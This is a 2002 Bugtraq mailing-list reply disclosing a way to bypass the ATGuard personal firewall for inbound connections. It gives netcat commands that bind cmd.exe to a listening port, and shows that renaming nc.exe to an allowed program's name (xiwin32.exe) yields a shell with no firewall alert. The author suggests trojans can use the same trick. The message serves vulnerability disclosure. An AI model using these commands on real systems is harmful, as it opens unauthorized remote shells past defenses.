[25327] in bugtraq
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
daemon@ATHENA.MIT.EDU (BlueScreen)
Tue Apr 30 19:26:59 2002
Message-ID: <001b01c1f03b$ddecb9a0$0100a8c0@BlueScreenPrimary>
From: "BlueScreen" <BlueScreen@IT-Checkpoint.net>
To: "Jonas Koch" <jonas.koch@gmx.ch>
Cc: <bugtraq@securityfocus.com>
Date: Tue, 30 Apr 2002 13:40:32 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
As far as i see the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard-Problem still goes futher, it is also a problem with inbound
connections.
I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).
So, i just did the following:
I:\>cd netcat
I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l
I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now i did the following:
I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-german
readers : 1 File copied :)
I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l
Trying it with telnet again, i got a very nice shell without any notice from
ATGuard.
That's why i mentioned also trojan horses in my Advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.
> There is no ultimate way to control all outbound communication. If you use
> your own low-level drivers, no personal firewall can stop you.
Surely there is no ultimate way. But if you are not aware that a problem
exists, you can't think about solutions.
Also, you perhaps will think that your personal firewall is perfectly safe
while it isn't.
Best regards,
-------------------------------------------------------
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de
==================================================================
To encrypt classified messages, please download and use this PGP-Key:
http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==================================================================
